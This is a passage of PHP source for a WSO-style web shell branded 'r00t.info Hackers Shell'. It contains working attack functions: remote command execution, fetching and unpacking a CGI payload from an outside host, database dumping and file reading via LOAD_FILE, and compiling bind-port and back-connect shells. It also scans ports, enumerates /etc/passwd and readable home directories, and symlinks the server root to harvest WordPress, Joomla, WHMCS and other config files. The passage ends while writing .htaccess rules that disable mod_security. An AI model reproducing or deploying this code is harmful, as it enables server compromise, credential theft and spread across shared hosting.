$_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = false;\r\n echo \'</select><input type=button onclick="add(document.cf.alias.value);\r\nif(document.cf.ajax.checked){a(null,null,document.cf.alias.value);\r\n}else{g(null,null,document.cf.alias.value);\r\n}" value=">>"> <input type=checkbox name=ajax value=1 \'.($_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\').\'> send using AJAX<br/><textarea class=bigarea name=output style="border-bottom:0;\r\n" readonly>\';\r\n if(!empty($_POST[\'p1\'])) { echo htmlspecialchars("$ ".$_POST[\'p1\']."\\n".ex($_POST[\'p1\']));\r\n } echo \'</textarea><input type=text name=cmd style="border-top:0;\r\nwidth:100%;\r\n" onkeydown="kp(event);\r\n">\';\r\n echo \'</form></div><script>document.cf.cmd.focus();\r\n</script>\';\r\n printFooter();\r\n } function actionLogout() { unset($_SESSION[md5($_SERVER[\'HTTP_HOST\'])]);\r\n echo \'\r\n <!--r00t.info Hackers Shell-->\r\n <!--Recoded by: Smurfie-->\r\n\r\n\r\n <script>alert("Logout Successful")</script>\r\n <body bgcolor=#ffffff><center><img src="http://r00t.info/shell-dosyalar/logo.png"></center>\r\n <H1><center><p style="color: #DF0101" >r00t.info Hackers Shell</p></H1>\r\n <center>\r\n<iframe src="http://www.facebook.com/plugins/likebox.php?\r\nhref=https://www.facebook.com/r00t.info&amp;\r\nwidth=260&amp;\r\ncolorsche\r\nme=light&amp;\r\nshow_faces=true&amp;\r\nborder_color=\r\n%23fff&amp;\r\nstream=false&amp;\r\nheader=false&amp;\r\nheight=100" scrolling="no" \r\nframeborder="0" style="background:transparent;\r\n border:none;\r\n overflow:hidden;\r\n width:200px;\r\n \r\nheight:100px;\r\n" allowtransparency="true"></iframe></center>\r\n <H3><marquee scrollamount="5" scrolldelay="50" width="100%"><p style="color: #DF0101" >Wso shell</p></marquee></H3></body>\';\r\n } function actionSelfRemove() { printHeader();\r\n if($_POST[\'p1\'] == \'yes\') { if(@unlink(SELF_PATH)) die(\'Shell has been removed\');\r\n else echo \'unlink error!\';\r\n } echo \'<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\\\'yes\\\')">Yes</a></div>\';\r\n printFooter();\r\n } function actionCgi() { printHeader();\r\n if(!file_exists(\'cgi/rot.cin\')){ $dizin = \'https://byr00t.co/vb/cgi.zip\';\r\n function dosya_indir($link,$name=null) { $link_info = pathinfo($link);\r\n $uzanti = strtolower($link_info[\'extension\']);\r\n $file = ($name) ? $name.\'.\'.$uzanti : $link_info[\'basename\'];\r\n $curl = curl_init($link);\r\n $fopen = fopen($file,\'w\');\r\n curl_setopt($curl, CURLOPT_HEADER,0);\r\n curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);\r\n curl_setopt($curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);\r\n curl_setopt($curl, CURLOPT_FILE, $fopen);\r\n curl_exec($curl);\r\n curl_close($curl);\r\n fclose($fopen);\r\n } dosya_indir($dizin, "cgi");\r\n $zip = new ZipArchive();\r\n $file = \'cgi.zip\';\r\n $zip->open($file);\r\n $cikar = $zip->extractTo(\'cgi/\');\r\n if(file_exists(\'cgi.zip\')){ @unlink(\'cgi.zip\');\r\n } if($cikar){ chmod(\'cgi/rot.cin\', 0755);\r\n echo "<iframe src=cgi/rot.cin width=100% height=100% frameborder=0></iframe> ";\r\n } else{ echo \'<div class="alert alert-danger"><strong>Hata!</strong> Dosya indirilirken kritik bir hata oluÅŸtu.</div>\';\r\n } } elseif(file_exists(\'cgi/rot.cin\')){ echo "<iframe src=cgi/rot.cin width=100% height=100% frameborder=0></iframe> ";\r\n } printFooter();\r\n } function actionSql() { class DbClass { var $type;\r\n var $link;\r\n var $res;\r\n function DbClass($type) { $this->type = $type;\r\n } function connect($host, $user, $pass, $dbname){ switch($this->type) { case \'mysql\': if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;\r\n break;\r\n case \'pgsql\': $host = explode(\':\', $host);\r\n if(!$host[1]) $host[1]=5432;\r\n if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;\r\n break;\r\n } return false;\r\n } function selectdb($db) { switch($this->type) { case \'mysql\': if (@mysql_select_db($db))return true;\r\n break;\r\n } return false;\r\n } function query($str) { switch($this->type) { case \'mysql\': return $this->res = @mysql_query($str);\r\n break;\r\n case \'pgsql\': return $this->res = @pg_query($this->link,$str);\r\n break;\r\n } return false;\r\n } function fetch() { $res = func_num_args()?func_get_arg(0):$this->res;\r\n switch($this->type) { case \'mysql\': return @mysql_fetch_assoc($res);\r\n break;\r\n case \'pgsql\': return @pg_fetch_assoc($res);\r\n break;\r\n } return false;\r\n } function listDbs() { switch($this->type) { case \'mysql\': return $this->res = @mysql_list_dbs($this->link);\r\n break;\r\n case \'pgsql\': return $this->res = $this->query("SELECT datname FROM pg_database");\r\n break;\r\n } return false;\r\n } function listTables() { switch($this->type) { case \'mysql\': return $this->res = $this->query(\'SHOW TABLES\');\r\n break;\r\n case \'pgsql\': return $this->res = $this->query("select table_name from information_schema.tables where (table_schema != \'information_schema\' AND table_schema != \'pg_catalog\') or table_name = \'pg_user\'");\r\n break;\r\n } return false;\r\n } function error() { switch($this->type) { case \'mysql\': return @mysql_error($this->link);\r\n break;\r\n case \'pgsql\': return @pg_last_error($this->link);\r\n break;\r\n } return false;\r\n } function setCharset($str) { switch($this->type) { case \'mysql\': if(function_exists(\'mysql_set_charset\')) return @mysql_set_charset($str, $this->link);\r\n else $this->query(\'SET CHARSET \'.$str);\r\n break;\r\n case \'mysql\': return @pg_set_client_encoding($this->link, $str);\r\n break;\r\n } return false;\r\n } function dump($table) { switch($this->type) { case \'mysql\': $res = $this->query(\'SHOW CREATE TABLE `\'.$table.\'`\');\r\n $create = mysql_fetch_array($res);\r\n echo $create[1].";\r\n\\n\\n";\r\n $this->query(\'SELECT * FROM `\'.$table.\'`\');\r\n while($item = $this->fetch()) { $columns = array();\r\n foreach($item as $k=>$v) { $item[$k] = "\'".@mysql_real_escape_string($v)."\'";\r\n $columns[] = "`".$k."`";\r\n } echo \'INSERT INTO `\'.$table.\'` (\'.implode(", ", $columns).\') VALUES (\'.implode(", ", $item).\');\r\n\'."\\n";\r\n } break;\r\n case \'pgsql\': $this->query(\'SELECT * FROM \'.$table);\r\n while($item = $this->fetch()) { $columns = array();\r\n foreach($item as $k=>$v) { $item[$k] = "\'".addslashes($v)."\'";\r\n $columns[] = $k;\r\n } echo \'INSERT INTO \'.$table.\' (\'.implode(", ", $columns).\') VALUES (\'.implode(", ", $item).\');\r\n\'."\\n";\r\n } break;\r\n } return false;\r\n } };\r\n $db = new DbClass(@$_POST[\'type\']);\r\n if(@$_POST[\'p2\']==\'download\') { ob_start("ob_gzhandler", 4096);\r\n $db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\']);\r\n $db->selectdb($_POST[\'sql_base\']);\r\n header("Content-Disposition: attachment;\r\n filename=dump.sql");\r\n header("Content-Type: text/plain");\r\n foreach($_POST[\'tbl\'] as $v) $db->dump($v);\r\n exit;\r\n } printHeader();\r\n echo \'<h1>Sql browser</h1><div class=content>\r\n <form name="sf" method="post">\r\n <table cellpadding="2" cellspacing="0">\r\n <tr>\r\n <td>Type</td>\r\n <td>Host</td>\r\n <td>Login</td>\r\n <td>Password</td>\r\n <td>Database</td>\r\n <td></td>\r\n </tr>\r\n <tr>\r\n <input type=hidden name=a value=Sql>\r\n <input type=hidden name=p1 value=\\\'query\\\'>\r\n <input type=hidden name=p2>\r\n <input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type=hidden name=charset value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n <td>\r\n <select name=\\\'type\\\'>\r\n <option value="mysql" \'.(@$_POST[\'type\']==\'mysql\'?\'selected\':\'\').\'>MySql</option>\r\n <option value="pgsql" \'.(@$_POST[\'type\']==\'pgsql\'?\'selected\':\'\').\'>PostgreSql</option>\r\n </select></td>\r\n <td><input type=text name=sql_host value="\'.(empty($_POST[\'sql_host\'])?\'localhost\':htmlspecialchars($_POST[\'sql_host\'])).\'"></td>\r\n <td><input type=text name=sql_login value="\'.(empty($_POST[\'sql_login\'])?\'root\':htmlspecialchars($_POST[\'sql_login\'])).\'"></td>\r\n <td><input type=text name=sql_pass value="\'.(empty($_POST[\'sql_pass\'])?\'\':htmlspecialchars($_POST[\'sql_pass\'])).\'"></td>\r\n <td>\';\r\n $tmp = "<input type=text name=sql_base value=\'\'>";\r\n if(isset($_POST[\'sql_host\'])){ if($db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\'])) { switch($_POST[\'charset\']) { case "Windows-1251": $db->setCharset(\'cp1251\');\r\n break;\r\n case "UTF-8": $db->setCharset(\'utf8\');\r\n break;\r\n case "KOI8-R": $db->setCharset(\'koi8r\');\r\n break;\r\n case "KOI8-U": $db->setCharset(\'koi8u\');\r\n break;\r\n case "cp866": $db->setCharset(\'cp866\');\r\n break;\r\n } $db->listDbs();\r\n echo "<select name=sql_base><option value=\'\'></option>";\r\n while($item = $db->fetch()) { list($key, $value) = each($item);\r\n echo \'<option value="\'.$value.\'" \'.($value==$_POST[\'sql_base\']?\'selected\':\'\').\'>\'.$value.\'</option>\';\r\n } echo \'</select>\';\r\n } else echo $tmp;\r\n }else echo $tmp;\r\n echo \'</td>\r\n <td><input type=submit value=">>"></td>\r\n </tr>\r\n </table>\r\n <script>\r\n function st(t,l) {\r\n document.sf.p1.value = \\\'select\\\';\r\n\r\n document.sf.p2.value = t;\r\n\r\n if(l!=null)document.sf.p3.value = l;\r\n\r\n document.sf.submit();\r\n\r\n }\r\n function is() {\r\n for(i=0;\r\ni<document.sf.elements[\\\'tbl[]\\\'].length;\r\n++i)\r\n document.sf.elements[\\\'tbl[]\\\'][i].checked = !document.sf.elements[\\\'tbl[]\\\'][i].checked;\r\n\r\n }\r\n </script>\';\r\n if(isset($db) && $db->link){ echo "<br/><table width=100% cellpadding=2 cellspacing=0>";\r\n if(!empty($_POST[\'sql_base\'])){ $db->selectdb($_POST[\'sql_base\']);\r\n echo "<tr><td width=1 style=\'border-top:2px solid #666;\r\nborder-right:2px solid #666;\r\n\'><span>Tables:</span><br><br>";\r\n $tbls_res = $db->listTables();\r\n while($item = $db->fetch($tbls_res)) { list($key, $value) = each($item);\r\n $n = $db->fetch($db->query(\'SELECT COUNT(*) as n FROM \'.$value.\'\'));\r\n $value = htmlspecialchars($value);\r\n echo "<nobr><input type=\'checkbox\' name=\'tbl[]\' value=\'".$value."\'>&nbsp;\r\n<a href=# onclick=\\"st(\'".$value."\')\\">".$value."</a> (".$n[\'n\'].")</nobr><br>";\r\n } echo "<input type=\'checkbox\' onclick=\'is();\r\n\'> <input type=button value=\'Dump\' onclick=\'document.sf.p2.value=\\"download\\";\r\ndocument.sf.submit();\r\n\'></td><td style=\'border-top:2px solid #666;\r\n\'>";\r\n if(@$_POST[\'p1\'] == \'select\') { $_POST[\'p1\'] = \'query\';\r\n $db->query(\'SELECT COUNT(*) as n FROM \'.$_POST[\'p2\'].\'\');\r\n $num = $db->fetch();\r\n $num = $num[\'n\'];\r\n echo "<span>".$_POST[\'p2\']."</span> ($num) ";\r\n for($i=0;\r\n$i<($num/30);\r\n$i++) if($i != (int)$_POST[\'p3\']) echo "<a href=\'#\' onclick=\'st(\\"".$_POST[\'p2\']."\\", $i)\'>",($i+1),"</a> ";\r\n else echo ($i+1)," ";\r\n if($_POST[\'type\']==\'pgsql\') $_POST[\'p3\'] = \'SELECT * FROM \'.$_POST[\'p2\'].\' LIMIT 30 OFFSET \'.($_POST[\'p3\']*30);\r\n else $_POST[\'p3\'] = \'SELECT * FROM `\'.$_POST[\'p2\'].\'` LIMIT \'.($_POST[\'p3\']*30).\',30\';\r\n echo "<br><br>";\r\n } if((@$_POST[\'p1\'] == \'query\') && !empty($_POST[\'p3\'])) { $db->query(@$_POST[\'p3\']);\r\n if($db->res !== false) { $title = false;\r\n echo \'<table width=100% cellspacing=0 cellpadding=2 class=main>\';\r\n $line = 1;\r\n while($item = $db->fetch()) { if(!$title) { echo \'<tr>\';\r\n foreach($item as $key => $value) echo \'<th>\'.$key.\'</th>\';\r\n reset($item);\r\n $title=true;\r\n echo \'</tr><tr>\';\r\n $line = 2;\r\n } echo \'<tr class="l\'.$line.\'">\';\r\n $line = $line==1?2:1;\r\n foreach($item as $key => $value) { if($value == null) echo \'<td><i>null</i></td>\';\r\n else echo \'<td>\'.nl2br(htmlspecialchars($value)).\'</td>\';\r\n } echo \'</tr>\';\r\n } echo \'</table>\';\r\n } else { echo \'<div><b>Error:</b> \'.htmlspecialchars($db->error()).\'</div>\';\r\n } } echo "<br><textarea name=\'p3\' style=\'width:100%;\r\nheight:100px\'>".@htmlspecialchars($_POST[\'p3\'])."</textarea><br/><input type=submit value=\'Execute\'>";\r\n echo "</td></tr>";\r\n } echo "</table></form><br/><form onsubmit=\'document.sf.p1.value=\\"loadfile\\";\r\ndocument.sf.p2.value=this.f.value;\r\ndocument.sf.submit();\r\nreturn false;\r\n\'><span>Load file</span> <input class=\'toolsInp\' type=text name=f><input type=submit value=\'>>\'></form>";\r\n if(@$_POST[\'p1\'] == \'loadfile\') { $db->query("SELECT LOAD_FILE(\'".addslashes($_POST[\'p2\'])."\') as file");\r\n $file = $db->fetch();\r\n echo \'<pre class=ml1>\'.htmlspecialchars($file[\'file\']).\'</pre>\';\r\n } } echo \'</div>\';\r\n printFooter();\r\n } function actionNetwork() { printHeader();\r\n $back_connect_c="";\r\n $back_connect_p="";\r\n $bind_port_c="";\r\n $bind_port_p="";\r\n echo \'<h1>Network tools</h1><div class=content>\r\n <form name=\\\'nfp\\\' onSubmit="g(null,null,this.using.value,this.port.value,this.pass.value);\r\nreturn false;\r\n">\r\n <br /><span>Bind port to /bin/sh</span><br/>\r\n Port: <input type=\\\'text\\\' name=\\\'port\\\' value=\\\'443\\\'> Password: <input type=\\\'text\\\' name=\\\'pass\\\' value=\\\'smurf\\\'> Using: <select name="using"><option value=\\\'bpc\\\'>C</option><option value=\\\'bpp\\\'>Perl</option></select> <input type=submit value=">>">\r\n </form>\r\n <form name=\\\'nfp\\\' onSubmit="g(null,null,this.using.value,this.server.value,this.port.value);\r\nreturn false;\r\n">\r\n <br /><br /><span>Back-connect to</span><br/>\r\n Server: <input type=\\\'text\\\' name=\\\'server\\\' value="\'.$_SERVER[\'REMOTE_ADDR\'].\'"> Port: <input type=\\\'text\\\' name=\\\'port\\\' value=\\\'443\\\'> Using: <select name="using"><option value=\\\'bcc\\\'>C</option><option value=\\\'bcp\\\'>Perl</option></select> <input type=submit value=">>">\r\n </form><br>\';\r\n if(isset($_POST[\'p1\'])) { function cf($f,$t) { $w=@fopen($f,"w") or @function_exists(\'file_put_contents\');\r\n if($w) { @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));\r\n @fclose($w);\r\n } } if($_POST[\'p1\'] == \'bpc\') { cf("/tmp/bp.c",$bind_port_c);\r\n $out = ex("gcc -o /tmp/bp /tmp/bp.c");\r\n @unlink("/tmp/bp.c");\r\n $out .= ex("/tmp/bp ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");\r\n echo "<pre class=ml1>$out\\n".ex("ps aux | grep bp")."</pre>";\r\n } if($_POST[\'p1\'] == \'bpp\') { cf("/tmp/bp.pl",$bind_port_p);\r\n $out = ex(which("perl")." /tmp/bp.pl ".$_POST[\'p2\']." &");\r\n echo "<pre class=ml1>$out\\n".ex("ps aux | grep bp.pl")."</pre>";\r\n } if($_POST[\'p1\'] == \'bcc\') { cf("/tmp/bc.c",$back_connect_c);\r\n $out = ex("gcc -o /tmp/bc /tmp/bc.c");\r\n @unlink("/tmp/bc.c");\r\n $out .= ex("/tmp/bc ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");\r\n echo "<pre class=ml1>$out\\n".ex("ps aux | grep bc")."</pre>";\r\n } if($_POST[\'p1\'] == \'bcp\') { cf("/tmp/bc.pl",$back_connect_p);\r\n $out = ex(which("perl")." /tmp/bc.pl ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");\r\n echo "<pre class=ml1>$out\\n".ex("ps aux | grep bc.pl")."</pre>";\r\n } } echo \'</div>\';\r\n printFooter();\r\n } function actionPortScanner() { printHeader();\r\n echo \'<h1>Port Scanner</h1>\';\r\n echo \'<div class="content">\';\r\n echo \'<form action="" method="post">\';\r\n if(isset($_POST[\'host\']) && is_numeric($_POST[\'end\']) && is_numeric($_POST[\'start\'])){ $start = strip_tags($_POST[\'start\']);\r\n $end = strip_tags($_POST[\'end\']);\r\n $host = strip_tags($_POST[\'host\']);\r\n for($i = $start;\r\n $i<=$end;\r\n $i++){ $fp = @fsockopen($host, $i, $errno, $errstr, 3);\r\n if($fp){ echo \'Port \'.$i.\' is <font color=green>open</font><br>\';\r\n } flush();\r\n } } else { echo \'<br /><br /><center><input type="hidden" name="a" value="PortScanner"><input type="hidden" name=p1><input type="hidden" name="p2">\r\n <input type="hidden" name="c" value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type="hidden" name="charset" value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n Host: <input type="text" name="host" value="localhost"/><br /><br />\r\n Port start: <input type="text" name="start" value="0"/><br /><br />\r\n Port end:<input type="text" name="end" value="5000"/><br /><br />\r\n <input type="submit" value="Scan Ports" />\r\n </form></center><br /><br />\';\r\n } echo \'</div>\';\r\n printFooter();\r\n } function actionReadable() { printHeader();\r\n echo \'<h1>Readable Dirs</h1>\';\r\n echo \'<div class="content">\';\r\n $sm = ini_get(\'safe_mode\');\r\n if($sm) { echo \'<br /><b>Error: safe_mode = on</b><br /><br />\';\r\n } else { @$passwd = fopen(\'/etc/passwd\',\'r\');\r\n if (!$passwd) { echo \'<br /><b>[-] Error : coudn`t read /etc/passwd</b><br /><br />\';\r\n } else { $pub = array();\r\n $users = array();\r\n $conf = array();\r\n $i = 0;\r\n while(!feof($passwd)) { $str = fgets($passwd);\r\n if ($i > 35) { $pos = strpos($str,\':\');\r\n $username = substr($str,0,$pos);\r\n $dirz = \'/home/\'.$username.\'/public_html/\';\r\n if (($username != \'\')) { if (is_readable($dirz)) { array_push($users,$username);\r\n array_push($pub,$dirz);\r\n } } } $i++;\r\n } echo \'<br><br>\';\r\n echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\\n"."<br />";\r\n echo "[+] Founded ".sizeof($pub)." readable public_html directories\\n"."<br /><br /><br />";\r\n foreach ($users as $user) { $path = "/home/$user/public_html/";\r\n echo $path."<br>";\r\n } echo "<br /><br /><br />[+] Complete...\\n"."<br />";\r\n } } echo \'</div>\';\r\n printFooter();\r\n } function actionSymlink() { printHeader();\r\n echo \'<h1>Symlink</h1>\';\r\n $furl = \'http://\'.$_SERVER[\'SERVER_NAME\'].$_SERVER[\'REQUEST_URI\'];\r\n $expld = explode(\'/\',$furl );\r\n $burl =str_replace(end($expld),\'\',$furl);\r\n echo \'<div class="content"><center>\r\n <h3>[ <a href="#" onclick="g(\\\'symlink\\\',null,\\\'website\\\',null)">Domains</a> ] - \r\n [ <a href="#" onclick="g(\\\'symlink\\\',null,\\\'whole\\\',null)">Whole Server Symlink</a> ] - \r\n [ <a href="#" onclick="g(\\\'symlink\\\',null,\\\'config\\\',null)">Config files symlink</a> ]</h3></center>\';\r\n if(isset($_POST[\'p1\']) && $_POST[\'p1\']==\'website\') { echo "<center>";\r\n $d0mains = @file("/etc/named.conf");\r\n if(!$d0mains){ echo "<pre class=ml1 style=\'margin-top:5px\'>Cant access this file on server -> [ /etc/named.conf ]</pre></center>";\r\n } else { echo "<table align=center class=\'main\' border=0 ><tr><th> Count </th><th> Domains </th><th> Users </th></tr>";\r\n $unk = array();\r\n foreach($d0mains as $d0main){ if(@eregi("zone",$d0main)){ preg_match_all(\'#zone "(.*)"#\', $d0main, $domains);\r\n flush();\r\n if(strlen(trim($domains[1][0])) > 2){ $unk[] = $domains[1][0];\r\n flush();\r\n } } } $count=1;\r\n $unk = array_unique($unk);\r\n $l=0;\r\n foreach($unk as $d){ $user = posix_getpwuid(@fileowner("/etc/valiases/".$d));\r\n echo "<tr".($l?\' class=l1\':\'\')."><td>".$count."</td><td><a href=http://".$d."/>".$d."</a></td><td>".$user[\'name\']."</td></tr>";\r\n flush();\r\n $count++;\r\n $l=$l?0:1;\r\n } echo "</table>";\r\n } echo "</center>";\r\n } if(isset($_POST[\'p1\']) && $_POST[\'p1\']==\'whole\') { echo "<center>";\r\n @mkdir(\'sym\',0777);\r\n $hdt = "Options all \\n DirectoryIndex Sux.html \\n AddType text/plain .php \\n AddHandler server-parsed .php \\n AddType text/plain .html \\n AddHandler txt .html \\n Require None \\n Satisfy Any";\r\n $hfp =@fopen (\'sym/.htaccess\',\'w\');\r\n fwrite($hfp ,$hdt);\r\n if(function_exists(\'symlink\')) { @symlink(\'/\',\'sym/root\');\r\n } $d0mains = @file(\'/etc/named.conf\');\r\n if(!$d0mains) { echo "<pre class=ml1 style=\'margin-top:5px\'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";\r\n } else { echo "<table align=\'center\' width=\'40%\' class=\'main\'><tr><th> Count </th><th> Domains </th><th> User </th><th> Symlink </th></tr>";\r\n $count=1;\r\n $mck = array();\r\n foreach($d0mains as $d0main){ if(@eregi(\'zone\',$d0main)){ preg_match_all(\'#zone "(.*)"#\',$d0main,$domain);\r\n flush();\r\n if(strlen(trim($domain[1][0])) >2){ $mck[] = $domain[1][0];\r\n } } } $mck = array_unique($mck);\r\n $l=0;\r\n foreach($mck as $d) { $user = posix_getpwuid(@fileowner(\'/etc/valiases/\'.$d));\r\n $ddt = $user[\'name\'];\r\n $ddt = $d;\r\n if(@eregi("\\.ir",$d) or @eregi("\\.il",$d)) { $ddt = "<div style=\' color: #FF0000 ;\r\n text-shadow: 0px 0px 1px red;\r\n \'>".$d.\'</div>\';\r\n } echo "<tr".($l?\' class=l1\':\'\')."><td>".$count++."</td><td><a target=\'_blank\' href=http://".$d.\'/>\'.$ddt.\' </a></td><td>\'.$user[\'name\']."</td><td><a href=\'sym/root/home/".$user[\'name\']."/public_html\' target=\'_blank\'>symlink </a></td></tr>";\r\n flush();\r\n $l=$l?0:1;\r\n } echo \'</table>\';\r\n } echo "</center>";\r\n } if(isset($_POST[\'p1\']) && $_POST[\'p1\']==\'config\') { echo "<center>";\r\n @mkdir(\'sym\',0777);\r\n $hdt = "Options all \\n DirectoryIndex Sux.html \\n AddType text/plain .php \\n AddHandler server-parsed .php \\n AddType text/plain .html \\n AddHandler txt .html \\n Require None \\n Satisfy Any";\r\n $hfp = @fopen (\'sym/.htaccess\',\'w\');\r\n @fwrite($hfp ,$hdt);\r\n if(function_exists(\'symlink\')) { @symlink(\'/\',\'sym/root\');\r\n } $d0mains = @file(\'/etc/named.conf\');\r\n if(!$d0mains) { echo "<pre class=ml1 style=\'margin-top:5px\'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";\r\n } else { echo "<table align=\'center\' width=\'40%\' class=\'main\' ><tr><th> Count </th><th> Domains </th><th> Script </th></tr>";\r\n $count = 1;\r\n $l=0;\r\n foreach($d0mains as $d0main){ if(@eregi(\'zone\',$d0main)){ preg_match_all(\'#zone "(.*)"#\',$d0main,$domain);\r\n flush();\r\n if(strlen(trim($domain[1][0]))>2){ $user = posix_getpwuid(@fileowner(\'/etc/valiases/\'.$domain[1][0]));\r\n $c1 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/wp-config.php\';\r\n $ch01 = get_headers($c1);\r\n $cf01 = $ch01[0];\r\n $c2 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/blog/wp-config.php\';\r\n $ch02 = get_headers($c2);\r\n $cf02 = $ch02[0];\r\n $c3 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/configuration.php\';\r\n $ch03 = get_headers($c3);\r\n $cf03 = $ch03[0];\r\n $c4 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/joomla/configuration.php\';\r\n $ch04 = get_headers($c4);\r\n $cf04 = $ch04[0];\r\n $c5 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/includes/config.php\';\r\n $ch05 = get_headers($c5);\r\n $cf05 = $ch05[0];\r\n $c6 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/vb/includes/config.php\';\r\n $ch06 = get_headers($c6);\r\n $cf06 = $ch06[0];\r\n $c7 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/forum/includes/config.php\';\r\n $ch07 = get_headers($c7);\r\n $cf07 = $ch07[0];\r\n $c8 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'public_html/clients/configuration.php\';\r\n $ch08 = get_headers($c8);\r\n $cf08 = $ch08[0];\r\n $c9 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/support/configuration.php\';\r\n $ch09 = get_headers($c9);\r\n $cf09 = $ch09[0];\r\n $c10 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/client/configuration.php\';\r\n $ch10 = get_headers($c10);\r\n $cf10 = $ch10[0];\r\n $c11 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/submitticket.php\';\r\n $ch11 = get_headers($c11);\r\n $cf11 = $ch11[0];\r\n $c12 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/client/configuration.php\';\r\n $ch12 = get_headers($c12);\r\n $cf12 = $ch12[0];\r\n $c13 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/includes/configure.php\';\r\n $ch13 = get_headers($c13);\r\n $cf13 = $ch13[0];\r\n $c14 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/include/app_config.php\';\r\n $ch14 = get_headers($c14);\r\n $cf14 = $ch14[0];\r\n $c15 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/sites/default/settings.php\';\r\n $ch15 = get_headers($c15);\r\n $cf15 = $ch15[0];\r\n $out = \'&nbsp;\r\n\';\r\n if(strpos($cf01,\'200\') == true) { $out = "<a href=\'".$c1."\' target=\'_blank\'>Wordpress</a>";\r\n } elseif(strpos($cf02,\'200\') == true) { $out = "<a href=\'".$c2."\' target=\'_blank\'>Wordpress</a>";\r\n } elseif(strpos($cf03,\'200\') == true && strpos($cf11,\'200\') == true) { $out = " <a href=\'".$c11."\' target=\'_blank\'>WHMCS</a>";\r\n } elseif(strpos($cf09,\'200\') == true) { $out = " <a href=\'".$c9."\' target=\'_blank\'>WHMCS</a>";\r\n } elseif(strpos($cf10,\'200\') == true) { $out = " <a href=\'".$c10."\' target=\'_blank\'>WHMCS</a>";\r\n } elseif(strpos($cf03,\'200\') == true) { $out = " <a href=\'".$c3."\' target=\'_blank\'>Joomla</a>";\r\n } elseif(strpos($cf04,\'200\') == true) { $out = " <a href=\'".$c4."\' target=\'_blank\'>Joomla</a>";\r\n } elseif(strpos($cf05,\'200\') == true) { $out = " <a href=\'".$c5."\' target=\'_blank\'>vBulletin</a>";\r\n } elseif(strpos($cf06,\'200\') == true) { $out = " <a href=\'".$c6."\' target=\'_blank\'>vBulletin</a>";\r\n } elseif(strpos($cf07,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>vBulletin</a>";\r\n } elseif(strpos($cf08,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>Client Area</a>";\r\n } elseif(strpos($cf12,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>Client Area</a>";\r\n } elseif(strpos($cf13,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>osCommerce/Zen Cart</a>";\r\n } elseif(strpos($cf14,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>Magento</a>";\r\n } elseif(strpos($cf15,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>Drupal</a>";\r\n } else { continue;\r\n } echo \'<tr\'.($l?\' class=l1\':\'\').\'><td>\'.$count++.\'</td><td><a href=http://www.\'.$domain[1][0].\'/>\'.$domain[1][0].\'</a></td><td>\'.$user[\'name\'].\'</td><td>\'.$out.\'</td></tr>\';\r\n flush();\r\n $l=$l?0:1;\r\n } } } echo "</table>";\r\n } echo "</center>";\r\n } echo "</div>";\r\n printFooter();\r\n } function actionSafeMode() { printHeader();\r\n echo \'<h1>Safe Mode</h1>\';\r\n echo \'<div class="content">\';\r\n echo "<div class=header><center><h3><span>| SAFE MODE AND MOD SECURITY DISABLED AND PERL 500 INTERNAL ERROR BYPASS |</span></h3>Following php.ini and .htaccess(mod) and perl(.htaccess)[convert perl extention *.pl => *.sh ] files create in following dir<br>| ".$GLOBALS[\'cwd\']." |<br><br />";\r\n echo \'<a href=# onclick="g(null,null,\\\'php.ini\\\',null)">| PHP.INI | </a><a href=# onclick="g(null,null,null,\\\'ini\\\')">| .htaccess(Mod) | </a><a href=# onclick="g(null,null,null,null,\\\'sh\\\')">| .htaccess(perl) | </a></center>\';\r\n if(!empty($_POST[\'p2\']) && isset($_POST[\'p2\'])) { $fil=fopen($GLOBALS[\'cwd\'].".htaccess","w");\r\n fwrite($fil,\'<IfModule mod_security.c>\r\n Sec------Engine Off\r\n Sec------ScanPOST Off\r\n </IfModule>\');\r\n fclose($fil);\r\n } if(!empty($_POST[\'p1\'])&& isset($_POST[\'p1\'])) { 